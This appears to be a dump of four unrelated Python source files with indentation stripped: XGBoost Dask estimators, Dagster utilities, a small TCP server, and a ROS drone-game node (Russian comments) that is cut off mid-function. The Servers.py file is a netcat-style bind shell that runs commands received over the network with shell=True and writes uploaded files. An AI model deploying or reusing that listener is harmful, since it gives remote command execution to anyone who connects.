eval_metric: Optional[Union[str, List[str], Metric]] = None,
early_stopping_rounds: Optional[int] = None,
verbose: bool = True,
xgb_model: Optional[Union[Booster, XGBModel]] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
base_margin_eval_set: Optional[List[_DaskCollection]] = None,
feature_weights: Optional[_DaskCollection] = None,
callbacks: Optional[List[TrainingCallback]] = None,
) -> "DaskXGBRegressor":
_assert_dask_support()
args = {k: v for k, v in locals().items() if k != "self"}
return self.client.sync(self._fit_async, **args)
@xgboost_model_doc(
'Implementation of the scikit-learn API for XGBoost classification.',
['estimators', 'model'])
class DaskXGBClassifier(DaskScikitLearnBase, XGBClassifierBase):
# pylint: disable=missing-class-docstring
async def _fit_async(
self, X: _DaskCollection, y: _DaskCollection,
sample_weight: Optional[_DaskCollection],
base_margin: Optional[_DaskCollection],
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
eval_metric: Optional[Union[str, List[str], Metric]],
sample_weight_eval_set: Optional[List[_DaskCollection]],
base_margin_eval_set: Optional[List[_DaskCollection]],
early_stopping_rounds: int,
verbose: bool,
xgb_model: Optional[Union[Booster, XGBModel]],
feature_weights: Optional[_DaskCollection],
callbacks: Optional[List[TrainingCallback]]
) -> "DaskXGBClassifier":
params = self.get_xgb_params()
dtrain, evals = await _async_wrap_evaluation_matrices(
self.client,
X=X,
y=y,
group=None,
qid=None,
sample_weight=sample_weight,
base_margin=base_margin,
feature_weights=feature_weights,
eval_set=eval_set,
sample_weight_eval_set=sample_weight_eval_set,
base_margin_eval_set=base_margin_eval_set,
eval_group=None,
eval_qid=None,
missing=self.missing,
)
# pylint: disable=attribute-defined-outside-init
if isinstance(y, (da.Array)):
self.classes_ = await self.client.compute(da.unique(y))
else:
self.classes_ = await self.client.compute(y.drop_duplicates())
self.n_classes_ = len(self.classes_)
if self.n_classes_ > 2:
params["objective"] = "multi:softprob"
params['num_class'] = self.n_classes_
else:
params["objective"] = "binary:logistic"
if callable(self.objective):
obj = _objective_decorator(self.objective)
else:
obj = None
model, metric, params = self._configure_fit(
booster=xgb_model, eval_metric=eval_metric, params=params
)
results = await train(
client=self.client,
params=params,
dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals,
obj=obj,
feval=metric,
verbose_eval=verbose,
early_stopping_rounds=early_stopping_rounds,
callbacks=callbacks,
xgb_model=model,
)
self._Booster = results['booster']
if not callable(self.objective):
self.objective = params["objective"]
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
# pylint: disable=unused-argument
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]] = None,
eval_metric: Optional[Union[str, List[str], Metric]] = None,
early_stopping_rounds: Optional[int] = None,
verbose: bool = True,
xgb_model: Optional[Union[Booster, XGBModel]] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
base_margin_eval_set: Optional[List[_DaskCollection]] = None,
feature_weights: Optional[_DaskCollection] = None,
callbacks: Optional[List[TrainingCallback]] = None
) -> "DaskXGBClassifier":
_assert_dask_support()
args = {k: v for k, v in locals().items() if k != 'self'}
return self.client.sync(self._fit_async, **args)
async def _predict_proba_async(
self,
X: _DaskCollection,
validate_features: bool,
output_margin: bool,
base_margin: Optional[_DaskCollection],
iteration_range: Optional[Tuple[int, int]],
) -> _DaskCollection:
if iteration_range is None:
iteration_range = (0, 0)
predts = await super()._predict_async(
data=X,
output_margin=output_margin,
validate_features=validate_features,
base_margin=base_margin,
iteration_range=iteration_range,
)
return _cls_predict_proba(self.objective, predts, da.vstack)
# pylint: disable=missing-function-docstring
def predict_proba(
self,
X: _DaskCollection,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
output_margin: bool = False,
base_margin: Optional[_DaskCollection] = None,
iteration_range: Optional[Tuple[int, int]] = None,
) -> Any:
_assert_dask_support()
msg = "`ntree_limit` is not supported on dask, use `iteration_range` instead."
assert ntree_limit is None, msg
return self.client.sync(
self._predict_proba_async,
X=X,
validate_features=validate_features,
output_margin=output_margin,
base_margin=base_margin,
iteration_range=iteration_range,
)
predict_proba.__doc__ = XGBClassifier.predict_proba.__doc__
async def _predict_async(
self,
data: _DaskCollection,
output_margin: bool,
validate_features: bool,
base_margin: Optional[_DaskCollection],
iteration_range: Optional[Tuple[int, int]],
) -> _DaskCollection:
pred_probs = await super()._predict_async(
data, output_margin, validate_features, base_margin, iteration_range
)
if output_margin:
return pred_probs
if len(pred_probs.shape) == 1:
preds = (pred_probs > 0.5).astype(int)
else:
assert len(pred_probs.shape) == 2
assert isinstance(pred_probs, da.Array)
# when using da.argmax directly, dask will construct a numpy based return
# array, which runs into error when computing GPU based prediction.
def _argmax(x: Any) -> Any:
return x.argmax(axis=1)
preds = da.map_blocks(_argmax, pred_probs, drop_axis=1)
return preds
@xgboost_model_doc(
"""Implementation of the Scikit-Learn API for XGBoost Ranking.
.. versionadded:: 1.4.0
""",
["estimators", "model"],
end_note="""
Note
----
For dask implementation, group is not supported, use qid instead.
""",
)
class DaskXGBRanker(DaskScikitLearnBase, XGBRankerMixIn):
@_deprecate_positional_args
def __init__(self, *, objective: str = "rank:pairwise", **kwargs: Any):
if callable(objective):
raise ValueError("Custom objective function not supported by XGBRanker.")
super().__init__(objective=objective, kwargs=kwargs)
async def _fit_async(
self,
X: _DaskCollection,
y: _DaskCollection,
group: Optional[_DaskCollection],
qid: Optional[_DaskCollection],
sample_weight: Optional[_DaskCollection],
base_margin: Optional[_DaskCollection],
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
sample_weight_eval_set: Optional[List[_DaskCollection]],
base_margin_eval_set: Optional[List[_DaskCollection]],
eval_group: Optional[List[_DaskCollection]],
eval_qid: Optional[List[_DaskCollection]],
eval_metric: Optional[Union[str, List[str], Metric]],
early_stopping_rounds: int,
verbose: bool,
xgb_model: Optional[Union[XGBModel, Booster]],
feature_weights: Optional[_DaskCollection],
callbacks: Optional[List[TrainingCallback]],
) -> "DaskXGBRanker":
msg = "Use `qid` instead of `group` on dask interface."
if not (group is None and eval_group is None):
raise ValueError(msg)
if qid is None:
raise ValueError("`qid` is required for ranking.")
params = self.get_xgb_params()
dtrain, evals = await _async_wrap_evaluation_matrices(
self.client,
X=X,
y=y,
group=None,
qid=qid,
sample_weight=sample_weight,
base_margin=base_margin,
feature_weights=feature_weights,
eval_set=eval_set,
sample_weight_eval_set=sample_weight_eval_set,
base_margin_eval_set=base_margin_eval_set,
eval_group=None,
eval_qid=eval_qid,
missing=self.missing,
)
if eval_metric is not None:
if callable(eval_metric):
raise ValueError(
"Custom evaluation metric is not yet supported for XGBRanker."
)
model, metric, params = self._configure_fit(
booster=xgb_model, eval_metric=eval_metric, params=params
)
results = await train(
client=self.client,
params=params,
dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals,
feval=metric,
verbose_eval=verbose,
early_stopping_rounds=early_stopping_rounds,
callbacks=callbacks,
xgb_model=model,
)
self._Booster = results["booster"]
self.evals_result_ = results["history"]
return self
# pylint: disable=unused-argument, arguments-differ
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
group: Optional[_DaskCollection] = None,
qid: Optional[_DaskCollection] = None,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]] = None,
eval_group: Optional[List[_DaskCollection]] = None,
eval_qid: Optional[List[_DaskCollection]] = None,
eval_metric: Optional[Union[str, List[str], Metric]] = None,
early_stopping_rounds: int = None,
verbose: bool = False,
xgb_model: Optional[Union[XGBModel, Booster]] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
base_margin_eval_set: Optional[List[_DaskCollection]] = None,
feature_weights: Optional[_DaskCollection] = None,
callbacks: Optional[List[TrainingCallback]] = None
) -> "DaskXGBRanker":
_assert_dask_support()
args = {k: v for k, v in locals().items() if k != "self"}
return self.client.sync(self._fit_async, **args)
# FIXME(trivialfis): arguments differ due to additional parameters like group and qid.
fit.__doc__ = XGBRanker.fit.__doc__
@xgboost_model_doc(
"""Implementation of the Scikit-Learn API for XGBoost Random Forest Regressor.
.. versionadded:: 1.4.0
""",
["model", "objective"],
extra_parameters="""
n_estimators : int
Number of trees in random forest to fit.
""",
)
class DaskXGBRFRegressor(DaskXGBRegressor):
@_deprecate_positional_args
def __init__(
self,
*,
learning_rate: Optional[float] = 1,
subsample: Optional[float] = 0.8,
colsample_bynode: Optional[float] = 0.8,
reg_lambda: Optional[float] = 1e-5,
**kwargs: Any
) -> None:
super().__init__(
learning_rate=learning_rate,
subsample=subsample,
colsample_bynode=colsample_bynode,
reg_lambda=reg_lambda,
**kwargs
)
def get_xgb_params(self) -> Dict[str, Any]:
params = super().get_xgb_params()
params["num_parallel_tree"] = self.n_estimators
return params
def get_num_boosting_rounds(self) -> int:
return 1
@xgboost_model_doc(
"""Implementation of the Scikit-Learn API for XGBoost Random Forest Classifier.
.. versionadded:: 1.4.0
""",
["model", "objective"],
extra_parameters="""
n_estimators : int
Number of trees in random forest to fit.
""",
)
class DaskXGBRFClassifier(DaskXGBClassifier):
@_deprecate_positional_args
def __init__(
self,
*,
learning_rate: Optional[float] = 1,
subsample: Optional[float] = 0.8,
colsample_bynode: Optional[float] = 0.8,
reg_lambda: Optional[float] = 1e-5,
**kwargs: Any
) -> None:
super().__init__(
learning_rate=learning_rate,
subsample=subsample,
colsample_bynode=colsample_bynode,
reg_lambda=reg_lambda,
**kwargs
)
def get_xgb_params(self) -> Dict[str, Any]:
params = super().get_xgb_params()
params["num_parallel_tree"] = self.n_estimators
return params
def get_num_boosting_rounds(self) -> int:
return 1
|
__init__.py | import contextlib
import datetime
import errno
import inspect
import multiprocessing
import os
import re
import signal
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
you encode a configuration file path in source file and want
in runnable in any current working directory)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
of that file. Otherwise it will be relative to script that
ran the test
Note: this is function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def merge_dicts(left, right):
check.dict_param(left, 'left')
check.dict_param(right, 'right')
result = left.copy()
result.update(right)
return result
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output(['python', path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = ['python', '-m', 'dagster', 'pipeline', 'execute', '-f', path, '-n', pipeline_fn_name]
if env_file:
cli_cmd.append('-e')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe)
raise cpe
@contextlib.contextmanager
def safe_tempfile_path():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
try:
yield Path(path).as_posix()
finally:
if os.path.exists(path):
os.unlink(path)
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
# This will raise a KeyboardInterrupt in python land - meaning this wont be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(target=_kill_on_event, args=(termination_event,))
int_thread.daemon = True
int_thread.start()
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
|
Servers.py | import socket
import subprocess
from threading import Thread
class Server:
def __init__(self, ip, port):
self.ip = ip
self.port = port
class TCPServer(Server):
def __init__(self, ip, port, upload_dst=None, execute=None, command=None):
super().__init__(ip, port)
self.upload_dst = upload_dst
self.execute = execute
self.command = command
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._bind()
def _bind(self):
self.server.bind((self.ip, self.port))
@staticmethod
def run_command(command):
command = command.rstrip()
try:
output = subprocess.check_output(command,
stderr=subprocess.STDOUT,
shell=True)
except:
output = b"Failed to execute command"
return output
def client_handler(self, client_socket):
if self.upload_dst:
file_buff = b''
while True:
data = client_socket.recv(4096)
if not data:
break
else:
file_buff += data
try:
with open(self.upload_dst, 'wb') as f:
f.write(file_buff)
client_socket.send(f"Successfully saved file to {self.upload_dst}".encode('utf-8'))
except:
client_socket.send(f"Failed to save file to {self.upload_dst}".encode('utf-8'))
if self.execute:
output = self.run_command(self.execute)
client_socket.send(output)
if self.command:
client_socket.send(b"$> ")
cmd_buff = client_socket.recv(1024)
response = self.run_command(cmd_buff)
client_socket.send(response)
else:
request = client_socket.recv(4096)
try:
request = request.decode('utf-8')
except UnicodeError:
pass
print(f"[*] Received: {request}")
client_socket.send(b"ACK!")
client_socket.close()
self.server.close()
def accept(self):
while True:
client, addr = self.server.accept()
print(f"[*] Connection received from: {addr[0]}:{addr[1]}")
client_handler = Thread(target=self.client_handler, args=(client,))
client_handler.start()
@classmethod
def server_loop(cls, host, port, upload_dst=None, execute=None, command=None, n_listen=5):
tcp_server = cls(host, port, upload_dst, execute, command)
tcp_server.server.listen(n_listen)
tcp_server.accept()
|
polygon_node.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import rospy
from rospy import Service, Publisher, Subscriber, ServiceProxy
from std_msgs.msg import Int8, Bool
from geometry_msgs.msg import Point
from kiberdrom_interfaces.srv import VertiportSet
from kiberdrom_interfaces.srv import PoliceState, PoliceStateResponse
from kiberdrom_interfaces.srv import GoToVertiport, GoToVertiportResponse
from kiberdrom_interfaces.srv import GoToCar, GoToCarResponse
from kiberdrom_interfaces.srv import GoToLand, GoToLandResponse
from kiberdrom_interfaces.srv import Access, AccessResponse
from kiberdrom_interfaces.msg import PoliceDetect, BoolArray, PioneerStatus, PioneerStatusArray, ColorRGBAArray, StringArray, StringArray2D, VertiportsStatus
from kiberdrom_interfaces.msg import CommandAction, CommandFeedback, CommandResult
from kiberdrom_core.util import replace_number, generate_password_string, get_parameter, get_pioneers_name, get_objects_from_dict
from kiberdrom_core.status import StatusPioneer, StatusVertiport, StatusPolygon
from kiberdrom_core.controller import SimplePioneer as Pioneer, Police, Logger
from kiberdrom_core.terminal import TerminalCommand
from gs_flight import CallbackEvent
from std_srvs.srv import SetBool
from std_srvs.srv import Empty
from std_srvs.srv import Trigger, TriggerResponse
from threading import Thread
from actionlib import SimpleActionServer
# Описание всех переменных можно найти в gs_pizero_server/config/variable.yaml
# /server/check параметры
MIN_CHARGE = get_parameter("/server/check/charge")
COLISION_DISTANCE = get_parameter("/server/check/colision_distance")
PIONEER_DEGREES_OK = get_parameter("/server/check/degrees/ok")
PIONEER_DEGREES_RANGE = get_parameter("/server/check/degrees/range")
LPS_POSITION_MIN = get_parameter("/server/check/lps_position") # TODO
ZOMBIE_TIME = get_parameter("/server/check/zombie_time") # TODO
ARM_TIME = get_parameter("/server/check/arm_time")
# /server/names параметры
POLICE = get_parameter("/server/names/police")
SEARCHER = get_parameter("/server/names/searcher")
KIBERPRO_TEAM = get_parameter("/server/names/kiberpro_team")
# /server/police параметры
POLICE_DETECT_RANGE_FIRST = get_parameter("/server/police/detect_range/first")
POLICE_DETECT_RANGE_SECOND = get_parameter("/server/police/detect_range/second")
POLICE_DETECT_RANGE_HEIGHT = get_parameter("/server/police/detect_range/height")
BLOCKING_TIME = get_parameter("/server/police/blocking_time")
# /server/polygon параметры
CAR = get_parameter("/server/polygon/car")
VERTIPORT_RANGE = get_parameter("/server/polygon/vertiport/range")
# /server/scenario параметры
DEFAULT_PASSWORD = get_parameter("/server/scenario/password/default")
GENERATE_PASSWORD = get_parameter("/server/scenario/password/generate")
PASSWORD_LENGTH = get_parameter("/server/scenario/password/length")
COUNT_SEARCHER = get_parameter("/server/scenario/count_searcher")
TIME_TO_SECOND = get_parameter("/server/scenario/time_to_second")
# /objects параметры
POLYGON_OBJECTS = get_objects_from_dict(get_parameter("/objects"))
def check_zero(position):
return (position.x != 0.0) and (position.y != 0.0)
def check_range(position1, position2, raduis_x, raduis_y, raduis_z): # проверка попадания объекта в зону действия другого
if check_zero(position1) and check_zero(position2):
return (abs(position1.x - position2.x) <= raduis_x) and (abs(position1.y - position2.y) <= raduis_y) and (abs(position1.z - position2.z) <= raduis_z)
else:
return False
class Scenario(): # класс сценария
def __init__(self, swarm, logger, vertiports, access_service):
self.number = -1 # счетчик сченария
self.run = True # флаг работы сценария
self.init = [False, False, False] # список флагов инициализации этапа
self.finish = [False, False, False] # список флагов окончания этапа
self.swarm = swarm
self.logger = logger
self.vertiports = vertiports
self.searcher_index = self.swarm.get_pioneer_index_by_name(SEARCHER) # индекс поисковика
self.password_received = False
self.password = DEFAULT_PASSWORD
if self.searcher_index is None: # если поисковик не установлен прекращаем работу сценария
self.run = False
self.__access_service = access_service
self.__access_service.handler = self.handle_access
def __waiting(self):
rospy.sleep(TIME_TO_SECOND)
self.logger.sendPoliceMsg(f"Результат: {self.swarm.pioneers[self.searcher_index].info.name} - {self.swarm.pioneers[self.searcher_index].vertiport_ok.count(True)}/{COUNT_SEARCHER}")
self.next()
def spin(self):
if self.run:
if self.number == 0: # первый этап
if not self.init[0]:
self.init[0] = True
self.swarm.change_all_status(StatusPioneer.BLOCK, False)
self.swarm.change_status(self.searcher_index, StatusPioneer.ON)
if self.swarm.pioneers[self.searcher_index].vertiport_ok.count(True) == COUNT_SEARCHER:
if not self.finish[0]:
Thread(target=self.__waiting).start() # запуск задержки
self.finish[0] = True
elif self.number == 1: # второй этап
if not self.init[1]:
self.vertiports.set_pause(False) # включаем вертипорты
self.swarm.change_all_status(StatusPioneer.ON) # разблокировка пионеров
self.init[1] = True
if self.password_received and not self.finish[1]:
self.finish[1] = True
self.logger.sendPoliceMsg(f"Команда киберпиратов взломала сервис бота")
elif self.number == 2: # третий этап
self.vertiports.all_zero()
self.run = False
def handle_access(self, request): # обработчик сервиса проверки пароля
self.password_received = (request.password == self.password)
return AccessResponse(self.password_received)
def next(self): # переключение на следующий этап сценария
if self.run:
if self.number < len(self.init):
self.number += 1
else:
self.run = False
def reset(self): # TODO перезапуск сценария
self.number = -1
class VertiportsController(): # класс управления вертипортами
def __init__(self, polygon_object = None):
self.status = []
self.position = []
self.full = []
detect_array = []
if polygon_object is not None:
for object in polygon_object:
if replace_number(object.type) == "vertiport":
self.position.append(object.position)
self.full.append(None)
detect_array.append(StringArray())
self.detect = StringArray2D(detect_array)
self.__status_subscriber = Subscriber("vertiports/status", VertiportsStatus, self.__callback_status)
rospy.wait_for_service("vertiports/control")
self.__vertiports_proxy = ServiceProxy("vertiports/control", VertiportSet)
self.__vertoports_pause = ServiceProxy("vertiports/pause", SetBool)
def __callback_status(self, data):
self.status = data.status.data
def set_vertiport(self, index, message): # запрос на занятия вертипорта
return self.__vertiports_proxy(index, message)
def all_zero(self): # обнуление всех вертипортов
self.status = []
self.set_pause()
self.set_pause(False)
def set_full(self, index, name, message): # метод занятия вертипорта с проверкой
if message:
if self.status[index] == StatusVertiport.READY.value:
if self.full[index] is None:
self.full[index] = name
self.set_vertiport(index, message)
# rospy.loginfo(f"{index}, {name}, {message} {True}")
return True
else:
if self.status[index] == StatusVertiport.BLOCK.value:
if self.full[index] == name:
self.full[index] = None
self.set_vertiport(index, message)
# rospy.loginfo(f"{index}, {name}, {message} {True}")
return True
# rospy.loginfo(f"{index}, {name}, {message} {False}")
return False
def set_pause(self, command = True): # остановка работы вертипортов
self.__vertoports_pause(command)
def check(self): # TODO проверка готовности вертипортов
return (len(self.status) > 0) and (len(self.color) > 0)
class PioneerController(): # класс управления пионеров
def __init__(self, status_publisher, request_service, police_publisher, logger = None):
self.logger = logger
names = get_pioneers_name()
names.sort()
self.pioneers = []
self.pioneers_last_pos = []
self.pioneers_last_pos_time = []
self.police = None
for name in names:
if name == POLICE: # определение полицейского
pioneer = Police(namespace=name, flight_callback = self.callback)
self.police = pioneer
else:
pioneer = Pioneer(namespace=name, flight_callback = self.callback)
self.pioneers.append(pioneer)
self.pioneers_last_pos_time.append(0.0)
self.pioneers_last_pos.append(Point())
self.__request_service = request_service
self.__request_service.handler = self.__hadle_request
self.__status_publisher = status_publisher
self.__status_publisher.publish(self.get_status_array())
self.__police_publisher = police_publisher
def get_pioneer_index_by_name(self, name): # получение индекса пионера по имени
for i in range(len(self.pioneers)):
if self.pioneers[i].info.name == name:
return i
def get_status_array(self): # получить массив статусов пионеров
status = []
for pioneer in self.pioneers:
status.append(pioneer.info)
return status
def __round_point(self, point): # коругление точки
point.x = round(point.x, 1)
point.y = round(point.y, 1)
point.z = round(point.z, 1)
return point
def change_status(self, index, status): # поменять статус
self.pioneers[index].info.status = status.value
self.__status_publisher.publish(self.get_status_array())
def change_all_status(self, status, publish = True): # поменять статус всем
for pioneer in self.pioneers:
pioneer.info.status = status.value
if publish:
self.__status_publisher.publish(self.get_status_array())
def __hadle_request(self, request): # обработчик запроса на блокировку хакера
if self.police is not None:
index = self.get_pioneer_index_by_name(request.name)
pioneer = self.pioneers[index]
position = pioneer.navigationManager.lps.position()
police_position = self.police.get_police_position()
if check_range(position, police_position, POLICE_DETECT_RANGE_SECOND, POLICE_DETECT_RANGE_SECOND, POLICE_DETECT_RANGE_HEIGHT) and not pioneer.inVertiport:
self.change_status(index, StatusPioneer.BLOCK)
self.logger.sendPoliceMsg(f"Полицейский перехватил аэробайк {pioneer.info.name}")
Thread(target=self.__blocking, args=(index, BLOCKING_TIME,)).start()
return GoToLandResponse(True)
else:
return GoToLandResponse(False)
def callback(self, data, name): # обработчик события АП
event = data.data
index = self.get_pioneer_index_by_name(name)
if event == CallbackEvent.SHOCK:
self.change_status(index, StatusPioneer.ERROR)
self.logger.sendShockMsg(f"{name} подозрение на столкновение")
elif event == CallbackEvent.TAKEOFF_COMPLETE:
self.pioneers_last_pos_time[index] = rospy.Time.now().to_sec()
self.pioneers_last_pos[index] = self.__round_point(self.pioneers[index].navigationManager.lps.position())
def check(self): # проверка пионеров
charge_status = []
# lps_status = []
yaw_status = []
# alive = []
msgs = []
for pioneer in self.pioneers:
charge = pioneer.charge > MIN_CHARGE
charge_status.append(charge)
if not charge:
msgs.append(f"{pioneer.info.name} низкий заряд АКБ")
yaw = pioneer.navigationManager.lps.yaw()
yaw_st = (yaw < PIONEER_DEGREES_OK + PIONEER_DEGREES_RANGE) and (yaw > PIONEER_DEGREES_OK - PIONEER_DEGREES_RANGE)
if not yaw_st:
msgs.append(f"{pioneer.info.name} неверный угол ({round(yaw, 1)})")
yaw_status.append(yaw_st)
# try:
# status = pioneer.boardManager.runStatus()
# alive.append(status)
# self.change_status()
# except:
# pass
if all(charge_status) and all(yaw_status):
return True, msgs
else:
return False, msgs
def __arming_by_time(self, index, time): # запуск и выключание моторов через вреям
self.pioneers[index].flightController.preflight()
rospy.sleep(time)
self.pioneers[index].flightController.disarm()
def check_motor(self): # проверка запуска моторов
for index in range(len(self.pioneers)):
Thread(target=self.__arming_by_time, args=(index, ARM_TIME,)).start()
def check_colision(self): # TODO проверка столкновений
for i in range(len(self.pioneers) - 1):
for j in range(j + 1, len(self.pioneers)):
position1 = self.pioneers[i].navigationManager.lps.position()
position2 = self.pioneers[j].navigationManager.lps.position()
if ((abs(position1.x - position2.x) <= COLISION_DISTANCE) and (abs(position1.y - position2.x) <= COLISION_DISTANCE)):
self.change_status(i, StatusPioneer.ERROR)
self.change_status(j, StatusPioneer.ERROR)
def __blocking(self, index, time): # блокировка пионера
self.pioneers[index].flasher.setPower(False)
self.pioneers[index].ledController.changeAllColor(255,130,0)
rospy.sleep(time)
self.change_status(index, StatusPioneer.ON)
self.pioneers[index].ledController.changeAllColor(0,0,0)
def check_police_detect(self): # проверка на попадание в зоны детектирования полицейского
if self.police is not None:
for pioneer in self.pioneers:
